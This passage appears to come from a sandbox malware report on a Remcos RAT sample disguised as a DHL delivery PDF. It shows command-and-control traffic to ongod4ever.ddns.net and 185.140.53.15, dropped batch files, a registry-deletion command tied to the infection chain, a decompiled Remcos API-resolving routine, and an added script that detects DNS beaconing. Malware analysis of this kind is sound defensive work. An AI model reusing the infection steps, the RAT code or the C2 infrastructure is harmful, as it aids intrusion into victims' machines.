                            Sep 27, 2021 20:41:29.164258957 CEST | 5652 | 49845 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:29.679605961 CEST | 49845 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:29.705378056 CEST | 5652 | 49845 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:30.956877947 CEST | 49846 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:30.982530117 CEST | 5652 | 49846 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:31.492367029 CEST | 49846 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:31.518776894 CEST | 5652 | 49846 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:32.023648977 CEST | 49846 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:32.049479008 CEST | 5652 | 49846 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:33.112512112 CEST | 49847 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:33.139110088 CEST | 5652 | 49847 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:33.648641109 CEST | 49847 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:33.674082994 CEST | 5652 | 49847 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:34.179969072 CEST | 49847 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:34.205533028 CEST | 5652 | 49847 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:35.229579926 CEST | 49848 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:35.255750895 CEST | 5652 | 49848 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:35.758285046 CEST | 49848 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:35.784475088 CEST | 5652 | 49848 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:36.289539099 CEST | 49848 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:36.315488100 CEST | 5652 | 49848 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:37.338762999 CEST | 49849 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:37.364265919 CEST | 5652 | 49849 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:37.867872000 CEST | 49849 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:37.893913984 CEST | 5652 | 49849 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:38.399072886 CEST | 49849 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:38.424658060 CEST | 5652 | 49849 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:39.455862999 CEST | 49851 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:39.482280970 CEST | 5652 | 49851 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:39.992872953 CEST | 49851 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:40.018836975 CEST | 5652 | 49851 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:40.524198055 CEST | 49851 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:40.551223040 CEST | 5652 | 49851 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:41.571621895 CEST | 49862 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:41.596802950 CEST | 5652 | 49862 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:42.102488041 CEST | 49862 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:42.128117085 CEST | 5652 | 49862 | 185.140.53.15 | 192.168.2.4
                            Sep 27, 2021 20:41:42.633773088 CEST | 49862 | 5652 | 192.168.2.4 | 185.140.53.15
                            Sep 27, 2021 20:41:42.659243107 CEST565249862185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:43.691113949 CEST498715652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:43.717178106 CEST565249871185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:44.227658987 CEST498715652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:44.253036022 CEST565249871185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:44.759078026 CEST498715652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:44.785418987 CEST565249871185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:45.809561968 CEST498725652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:45.834741116 CEST565249872185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:46.337189913 CEST498725652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:46.362776995 CEST565249872185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:46.868498087 CEST498725652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:46.894069910 CEST565249872185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:48.060870886 CEST498735652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:48.086034060 CEST565249873185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:48.587595940 CEST498735652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:48.613167048 CEST565249873185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:49.118729115 CEST498735652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:49.143979073 CEST565249873185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:50.167882919 CEST498745652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:50.193130016 CEST565249874185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:50.696935892 CEST498745652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:50.722172022 CEST565249874185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:51.228236914 CEST498745652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:51.254547119 CEST565249874185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:52.278573990 CEST498755652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:52.304378033 CEST565249875185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:52.806636095 CEST498755652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:52.834062099 CEST565249875185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:53.337838888 CEST498755652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:53.363450050 CEST565249875185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:54.387445927 CEST498765652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:54.412591934 CEST565249876185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:54.916549921 CEST498765652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:54.942821980 CEST565249876185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:55.447508097 CEST498765652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:55.474395990 CEST565249876185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:56.494640112 CEST498775652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:56.520145893 CEST565249877185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:57.025827885 CEST498775652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:57.051889896 CEST565249877185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:57.556952953 CEST498775652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:57.582830906 CEST565249877185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:58.607630014 CEST498785652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:58.634394884 CEST565249878185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:59.135330915 CEST498785652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:05.151293039 CEST498785652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:05.176501036 CEST565249878185.140.53.15192.168.2.4
                            Sep 27, 2021 20:42:06.621654987 CEST498795652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:06.647058010 CEST565249879185.140.53.15192.168.2.4
                            Sep 27, 2021 20:42:07.151632071 CEST498795652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:07.176831961 CEST565249879185.140.53.15192.168.2.4
                            Sep 27, 2021 20:42:07.682760000 CEST498795652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:07.710411072 CEST565249879185.140.53.15192.168.2.4
                            Sep 27, 2021 20:42:08.729939938 CEST498805652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:08.755093098 CEST565249880185.140.53.15192.168.2.4
                            Sep 27, 2021 20:42:09.261085033 CEST498805652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:09.286627054 CEST565249880185.140.53.15192.168.2.4
                            Sep 27, 2021 20:42:09.792313099 CEST498805652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:09.818428993 CEST565249880185.140.53.15192.168.2.4
                            Sep 27, 2021 20:42:10.844146967 CEST498815652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:10.870908976 CEST565249881185.140.53.15192.168.2.4

                            UDP Packets

                            Timestamp | Source Port | Dest Port | Source IP | Dest IP

                            DNS Queries

                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class

                            DNS Answers

                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                            Sep 27, 2021 20:41:33.111673117 CEST8.8.8.8192.168.2.40xf9b9No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:35.228498936 CEST8.8.8.8192.168.2.40x7da5No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:37.337399006 CEST8.8.8.8192.168.2.40x2de7No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:39.455291986 CEST8.8.8.8192.168.2.40xf6a1No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:41.570872068 CEST8.8.8.8192.168.2.40xc97dNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:43.690537930 CEST8.8.8.8192.168.2.40xdadcNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:45.808367014 CEST8.8.8.8192.168.2.40xc1b1No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:48.047791004 CEST8.8.8.8192.168.2.40x4ee2No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:50.166790962 CEST8.8.8.8192.168.2.40xd265No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:52.277652025 CEST8.8.8.8192.168.2.40x5e9bNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:54.386415005 CEST8.8.8.8192.168.2.40x88b9No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:56.493730068 CEST8.8.8.8192.168.2.40xd752No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:58.606566906 CEST8.8.8.8192.168.2.40x14d1No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:42:06.612971067 CEST8.8.8.8192.168.2.40x1b36No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:42:08.729338884 CEST8.8.8.8192.168.2.40x346aNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:42:10.839230061 CEST8.8.8.8192.168.2.40xfb67No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
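
                            The resolver log above shows the sandbox client asking 8.8.8.8 for ongod4ever.ddns.net, a dynamic-DNS host, roughly every two seconds for the whole run, each time getting 185.140.53.15, while the OneDrive names are looked up once. Two properties make that pattern cheap to hunt for in DNS telemetry: the name sits under a dynamic-DNS provider, and the spacing between lookups is nearly constant. The script below is an added example (not part of the Joe Sandbox report) that parses answer lines in the format of this table, re-delimited with " | " because the fused columns above cannot be split reliably, and flags names whose inter-query gaps have a low coefficient of variation. The sample rows are a subset of the table above; the dynamic-DNS suffix list, the thresholds and the field order are assumptions to tune for your own logs.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: a subset of the resolver answers from the table above,
# re-delimited with " | " so the columns parse unambiguously.
# Columns: timestamp | resolver | client | transaction ID | reply code | name | answer | type | class
SAMPLE_LOG = """\
Sep 27, 2021 20:40:36.441093922 CEST | 8.8.8.8 | 192.168.2.4 | 0xf6e3 | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 20:40:42.857904911 CEST | 8.8.8.8 | 192.168.2.4 | 0xe14e | No error (0) | onedrive.live.com | odc-web-geo.onedrive.akadns.net | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 20:40:44.717713118 CEST | 8.8.8.8 | 192.168.2.4 | 0xd5fc | No error (0) | bl30uw.sn.files.1drv.com | sn-files.fe.1drv.com | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 20:40:44.717713118 CEST | 8.8.8.8 | 192.168.2.4 | 0xd5fc | No error (0) | sn-files.fe.1drv.com | odc-sn-files-geo.onedrive.akadns.net | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 20:40:47.445765018 CEST | 8.8.8.8 | 192.168.2.4 | 0x216 | No error (0) | ongod4ever.ddns.net | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:49.554491997 CEST | 8.8.8.8 | 192.168.2.4 | 0x813 | No error (0) | ongod4ever.ddns.net | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:52.234039068 CEST | 8.8.8.8 | 192.168.2.4 | 0x73fa | No error (0) | ongod4ever.ddns.net | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:54.513664007 CEST | 8.8.8.8 | 192.168.2.4 | 0x620b | No error (0) | ongod4ever.ddns.net | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:56.808721066 CEST | 8.8.8.8 | 192.168.2.4 | 0xf61c | No error (0) | ongod4ever.ddns.net | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:40:59.013353109 CEST | 8.8.8.8 | 192.168.2.4 | 0xa4a5 | No error (0) | ongod4ever.ddns.net | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:01.114439011 CEST | 8.8.8.8 | 192.168.2.4 | 0x4f8b | No error (0) | ongod4ever.ddns.net | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:03.235649109 CEST | 8.8.8.8 | 192.168.2.4 | 0x4880 | No error (0) | ongod4ever.ddns.net | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:05.526628971 CEST | 8.8.8.8 | 192.168.2.4 | 0xd44d | No error (0) | ongod4ever.ddns.net | 185.140.53.15 | A (IP address) | IN (0x0001)
Sep 27, 2021 20:41:07.801413059 CEST | 8.8.8.8 | 192.168.2.4 | 0xca1e | No error (0) | ongod4ever.ddns.net | 185.140.53.15 | A (IP address) | IN (0x0001)
"""

# Assumption: an illustrative list of dynamic-DNS provider suffixes; extend it for your estate.
DYNAMIC_DNS_SUFFIXES = ("ddns.net", "no-ip.org", "no-ip.biz", "hopto.org", "zapto.org", "duckdns.org")


def parse_timestamp(text):
    """'Sep 27, 2021 20:40:36.441093922 CEST' -> naive datetime, truncated to microseconds."""
    stamp = text.rsplit(" ", 1)[0]            # drop the zone label
    head, frac = stamp.split(".")
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_log(text):
    """One dict per answer line; 'type' is the bare record type (A, CNAME, ...)."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, resolver, client, txid, rcode, name, answer, rtype, rclass = (f.strip() for f in line.split(" | "))
        records.append({"ts": parse_timestamp(ts), "resolver": resolver, "client": client, "txid": txid,
                        "rcode": rcode, "name": name.lower(), "answer": answer, "type": rtype.split(" ")[0]})
    return records


def is_dynamic_dns(name):
    return any(name == s or name.endswith("." + s) for s in DYNAMIC_DNS_SUFFIXES)


def flag_beacons(records, min_queries=8, max_cv=0.25):
    """Names looked up at least min_queries times at near-constant spacing.
    cv = standard deviation / mean of the inter-query gaps: a RAT retrying its C2 on a
    fixed timer sits far below max_cv, while user-driven lookups scatter widely."""
    stamps_by_name = defaultdict(list)
    for r in records:
        if r["type"] == "A":
            stamps_by_name[r["name"]].append(r["ts"])
    findings = {}
    for name, stamps in stamps_by_name.items():
        if len(stamps) < max(min_queries, 2):
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg > 0 else float("inf")
        if cv <= max_cv:
            findings[name] = {
                "queries": len(stamps),
                "mean_interval_s": round(avg, 3),
                "cv": round(cv, 3),
                "answers": sorted({r["answer"] for r in records if r["name"] == name}),
                "dynamic_dns": is_dynamic_dns(name),
            }
    return findings


if __name__ == "__main__":
    for name, info in flag_beacons(parse_log(SAMPLE_LOG)).items():
        print(name, info)
```

On the sample rows this reports ongod4ever.ddns.net with ten lookups about 2.26 s apart and a coefficient of variation under 0.1. Run the check against client-side query logs (Sysmon event ID 22, or a DNS sensor in front of the stub resolver) rather than upstream resolver logs: a caching resolver would collapse these repeats into one lookup per TTL, while the sandbox forwarded every query. Note also the 8 s gap between 20:41:58 and 20:42:06 in the full table; a single outlier like that raises the cv, so the threshold should be set on the run, not on one window.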

                            Code Manipulations

                            Statistics: CPU Usage, Memory Usage, High Level Behavior Distribution and Behavior (interactive per-process charts)

                            System Behavior

                            General

                            Start time:20:39:57
                            Start date:27/09/2021
                            Path:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe'
                            Imagebase:0x400000
                            File size:1009152 bytes
                            MD5 hash:3808D4A11CBEE20896CCA28F9A3BCB9B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low

                            General

                            Start time:20:40:20
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\mobsync.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\mobsync.exe
                            Imagebase:0x9d0000
                            File size:93184 bytes
                            MD5 hash:44C19378FA529DD88674BAF647EBDC3C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Author: unknown
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation:moderate

                            General

                            Start time:20:40:25
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:20:40:25
                            Start date:27/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:20:40:26
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:20:40:26
                            Start date:27/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:20:40:26
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:20:40:27
                            Start date:27/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:20:40:27
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg delete hkcu\Environment /v windir /f
                            Imagebase:0x310000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:20:40:28
                            Start date:27/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:20:40:31
                            Start date:27/09/2021
                            Path:C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
                            Imagebase:0x400000
                            File size:1009152 bytes
                            MD5 hash:3808D4A11CBEE20896CCA28F9A3BCB9B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Antivirus matches:
                            • Detection: 24%, ReversingLabs

                            General

                            Start time:20:40:39
                            Start date:27/09/2021
                            Path:C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
                            Imagebase:0x400000
                            File size:1009152 bytes
                            MD5 hash:3808D4A11CBEE20896CCA28F9A3BCB9B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi

                            General

                            Start time:20:40:59
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\mobsync.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\mobsync.exe
                            Imagebase:0x9d0000
                            File size:93184 bytes
                            MD5 hash:44C19378FA529DD88674BAF647EBDC3C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Author: unknown
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, Author: Joe Security

                            General

                            Start time:20:41:16
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\secinit.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\secinit.exe
                            Imagebase:0xb40000
                            File size:9728 bytes
                            MD5 hash:174A363BB5A2D88B224546C15DD10906
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, Author: unknown
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, Author: Joe Security

                            Disassembly

                            Code Analysis


                              Executed Functions

                              C-Code - Quality: 100%
                              			E0040D072() {
                              				// Resolves the APIs the RAT needs at run time and stores the pointers in
                              				// globals (0x46bdxx / 0x46beax), so none of them show up in the import table.
                              				struct HINSTANCE__* _t1;
                              				_Unknown_base(*)()* _t2;
                              				_Unknown_base(*)()* _t24;
                              
                              				_t1 = LoadLibraryA("Psapi.dll"); // executed
                              				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
                              				 *0x46bd2c = _t2;
                              				if(_t2 == 0) {
                              					 // fallback: recent Windows versions export the Psapi functions from kernel32
                              					 *0x46bd2c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                              				}
                              				 *0x46bd20 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
                              				if( *0x46bd2c == 0) { // as compiled: re-tests the ANSI pointer, not *0x46bd20
                              					 *0x46bd20 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                              				}
                              				 *0x46bd28 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"); // unmaps a section in a target process; fits the foreign-memory writes flagged above
                              				 *0x46bd14 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx"); // host fingerprinting: RAM
                              				 *0x46beac = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process"); // host fingerprinting: 64-bit OS?
                              				 *0x46beb0 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW"); // used by E004166F6 below
                              				 *0x46bd24 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
                              				 *0x46bd18 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
                              				 *0x46bd30 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW"); // monitor enumeration (screen capture)
                              				 *0x46bd34 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
                              				 *0x46bd1c = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
                              				_t24 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc); // imported by ordinal 12, not by name
                              				 *0x46bd10 = _t24;
                              				return _t24;
                              			}






                              Instruction addresses, one per decompiled line in order: 0x0040d085 0x0040d08e 0x0040d096 0x0040d09d 0x0040d0ae 0x0040d0ae 0x0040d0c9 0x0040d0ce 0x0040d0df 0x0040d0df 0x0040d0fd 0x0040d111 0x0040d125 0x0040d139 0x0040d14d 0x0040d161 0x0040d175 0x0040d189 0x0040d19a 0x0040d1a2 0x0040d1a6 0x0040d1ac

                              APIs
                              • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00000000,Remcos-8VTGWT,00000001,0040C86E), ref: 0040D085
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D08E
                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040D0A9
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D0AC
